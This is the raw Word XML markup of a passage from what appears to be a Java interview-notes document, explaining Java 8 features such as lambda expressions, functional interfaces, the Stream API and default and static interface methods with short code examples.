    <w:p w14:paraId="46FF8D5A" w14:textId="4D2A8962" w:rsidR="00505FCD" w:rsidRPr="00CE4B95" w:rsidRDefault="00505FCD" w:rsidP="00505FCD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="212" w:name="_Toc196307692"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Java 8 Features</w:t>
      </w:r>
      <w:bookmarkEnd w:id="212"/>
    </w:p>
    <w:p w14:paraId="3191F20C" w14:textId="77777777" w:rsidR="00505FCD" w:rsidRPr="00CE4B95" w:rsidRDefault="00505FCD" w:rsidP="00B13CFA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9503BD" w14:textId="77777777" w:rsidR="00520371" w:rsidRPr="00CE4B95" w:rsidRDefault="00520371">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_Toc196307693"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Java8 features?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="213"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BD339E" w14:textId="2EAFEF6C" w:rsidR="00520371" w:rsidRPr="00CE4B95" w:rsidRDefault="00520371">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DA25D7" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Java 8 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA6460" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Java 8, released in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>March 2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, was a major release that introduced </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>functional programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>default methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, making Java much more expressive and modern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4019845A" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="29E74544">
          <v:rect id="_x0000_i1671" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF7437E" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1. Lambda Expressions (JEP 126)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E5079A" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Introduces anonymous functions to make code more concise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADA18B2" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32B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6592618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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name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f</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li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Bob"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F347F4" w14:textId="1FEA63FE" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32B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6592618"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name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orEac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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07880D8B" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Reduces boilerplate for iterators, callbacks, and functional logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097C4120" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="285918B2">
          <v:rect id="_x0000_i1672" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDB21DE" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Functional Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF3929" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>An interface with a single abstract method, used as the target for lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BDA00" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32B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519162"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736EE05" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32B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519162"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interfac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Fun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15607C1" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32B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51916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show</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047CC62" w14:textId="5C333330" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32B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519162"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D3F83" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Examples: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Predicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A6AB7" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="7D153A14">
          <v:rect id="_x0000_i1673" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FCDE6C" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Stream API (JEP 107)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EDBD4F" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Provides a high-level abstraction for processing sequences of elements (like collections) in a declarative way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E004B7" w14:textId="77777777" w:rsidR="00DE1A8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE1A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1017017"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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resul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p>
    <w:p w14:paraId="1821D1DA" w14:textId="77777777" w:rsidR="00DE1A8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE1A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10170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il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artsWith</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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A42EE" w14:textId="2617051A" w:rsidR="00DE1A8F" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE1A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10170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llec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ollecto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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E2E72" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>reduce</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>collect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F98BE5A" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="3262142B">
          <v:rect id="_x0000_i1674" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CB751D" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Style w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Default and Static Methods in Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75589B05" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Allows interfaces to have method implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172131A5" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interfac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Interfac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F7A4ECC" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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defaul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sh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22DC95E" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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Default Method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192EC4B" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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C7FEE96" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0B55A" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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76A14C4" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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tatic Method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAB593A" w14:textId="77777777" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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58621C6" w14:textId="5AFC1420" w:rsidR="00312CCE" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E9284C" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">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Enables interface evolution without breaking existing implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBB2DE" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B32BAB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="77AC75AF">
